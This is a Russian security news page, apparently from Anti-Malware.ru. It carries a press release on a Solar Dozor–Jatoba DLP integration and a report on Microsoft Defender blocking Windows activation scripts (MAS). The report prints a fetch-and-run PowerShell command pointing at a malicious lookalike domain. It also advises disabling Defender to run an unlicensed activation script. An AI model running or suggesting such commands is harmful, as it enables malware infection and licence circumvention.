Solar Dozor оптимизировал работу с архивом событий с помощью СУБД Jatoba

Solar Dozor оптимизировал работу с архивом событий с помощью СУБД Jatoba

Solar Dozor оптимизировал работу с архивом событий с помощью СУБД Jatoba

Компании «Газинформсервис» и «РТК-Солар» успешно завершили серию испытаний на совместимость продуктов собственной разработки. В результате технической интеграции был реализован многопользовательский доступ к расположенному в Solar Dozor архиву с разным уровнем конфиденциальности.

Производительный и безопасный архив ИБ-событий является важной частью DLP-cистемы Solar Dozor. В продукте реализованы механизмы оперативного и долгосрочного хранения информации, которые позволяют проводить расследования инцидентов на любом отрезке времени. Подтвержденные возможности архива Solar Dozor cоставляют свыше 10 лет хранения данных и более 1000 ТБ объема, при этом среднее время полнотекстового поиска по архиву занимает всего одну секунду.

Интеграция с СУБД Jatoba позволит повысить надежность, производительность и улучшить масштабируемость DLP-системы Solar Dozor. Это поможет офицерам безопасности эффективнее работать с системой и оперативнее проводить расследования.

«Информационная безопасность – как пазл, каждые части которого образуют общую структуру защищенного контура. DLP Solar Dozor месте с защищенной СУБД Jatoba образуют безопасное решение для защиты вашей инфраструктуры», – прокомментировал результаты тестирования Константин Семенчук, менеджер по продукту СУБД Jatoba.

«Комплексный подход в вопросах интеграции DLP-систем и СУБД позволяет закрыть не только актуальную на данный момент тему импортозамещения, но и является экономически выгодным решением для наших клиентов – позволяет оптимизировать бюджет, сохраняя при этом высокий уровень информационной защищенности организации. Техническая интеграция наших решений повысит производительность многоуровневых систем кибербезопасности и поможет офицерам безопасности эффективнее проводить расследования», - отмечает Руслан Добрынин, менеджер по развитию бизнеса Solar Dozor.

Оба продукта сертифицированы ФСТЭК России и включены в реестр отечественного ПО Минцифры России, что делает связку Solar Dozor – Jatoba оптимальным решением для компаний, замещающих иностранные ИТ-решения на отечественные.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru